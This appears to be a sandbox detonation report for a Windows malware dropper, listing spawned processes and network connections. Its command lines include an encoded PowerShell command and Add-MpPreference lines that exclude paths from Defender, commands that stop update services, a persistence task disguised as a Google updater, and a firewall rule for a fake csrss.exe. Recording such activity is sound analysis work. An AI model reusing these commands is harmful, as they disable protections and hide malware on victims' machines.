"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6608 -ip 6608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7LH6QY21.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7LH6QY21.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9100 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8936 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\1052.exe

C:\Users\Admin\AppData\Local\Temp\1052.exe

C:\Users\Admin\AppData\Local\Temp\11AB.exe

C:\Users\Admin\AppData\Local\Temp\11AB.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\47EE.exe

C:\Users\Admin\AppData\Local\Temp\47EE.exe

C:\Users\Admin\AppData\Local\Temp\4AED.exe

C:\Users\Admin\AppData\Local\Temp\4AED.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\4EA7.exe

C:\Users\Admin\AppData\Local\Temp\4EA7.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\4AED.exe

C:\Users\Admin\AppData\Local\Temp\4AED.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,5903306805400534213,15362566636710782255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\1062.exe

C:\Users\Admin\AppData\Local\Temp\1062.exe

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\7343.exe

C:\Users\Admin\AppData\Local\Temp\7343.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 accounts.google.com udp
US 104.244.42.65:443 twitter.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 store.steampowered.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 23.222.49.98:443 steamcommunity.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 65.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 98.49.222.23.in-addr.arpa udp
US 8.8.8.8:53 238.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.epicgames.com udp
US 44.197.1.250:443 www.epicgames.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 250.1.197.44.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 8.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 192.229.221.25:443 www.paypalobjects.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.182:443 i.ytimg.com tcp
US 8.8.8.8:53 c.paypal.com udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 8.8.8.8:53 182.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 c6.paypal.com udp
US 151.101.1.35:443 c6.paypal.com tcp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
NL 23.72.252.169:443 tcp
US 44.214.245.214:443 tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 176.252.72.23.in-addr.arpa udp
NL 23.72.252.169:443 tcp
RU 5.42.92.51:19057 tcp
NL 23.72.252.169:443 tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
NL 172.217.168.227:443 www.recaptcha.net udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 58.252.72.23.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 194.49.94.72:80 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 login.steampowered.com udp
NL 23.222.49.98:443 login.steampowered.com tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
NL 23.222.49.98:443 api.steampowered.com tcp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 152.199.21.141:443 tcp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 120.146.64.172.in-addr.arpa udp
US 104.244.42.194:443 api.twitter.com tcp
US 104.244.42.194:443 tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.218.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 90.218.19.104.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
NL 142.251.36.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 2.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 api.hcaptcha.com udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
NL 23.72.252.163:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 192.229.233.50:443 tcp
US 8.8.8.8:53 udp
US 68.232.34.217:443 tcp
US 104.244.42.133:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 rr3---sn-5hne6nsr.googlevideo.com udp
NL 172.217.132.72:443 rr3---sn-5hne6nsr.googlevideo.com tcp
NL 172.217.132.72:443 rr3---sn-5hne6nsr.googlevideo.com tcp
NL 172.217.132.72:443 rr3---sn-5hne6nsr.googlevideo.com tcp
NL 172.217.132.72:443 rr3---sn-5hne6nsr.googlevideo.com tcp
NL 172.217.132.72:443 rr3---sn-5hne6nsr.googlevideo.com tcp
NL 172.217.132.72:443 rr3---sn-5hne6nsr.googlevideo.com tcp
US 8.8.8.8:53 72.132.217.172.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 194.49.94.11:80 tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 185.174.136.219:443 tcp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
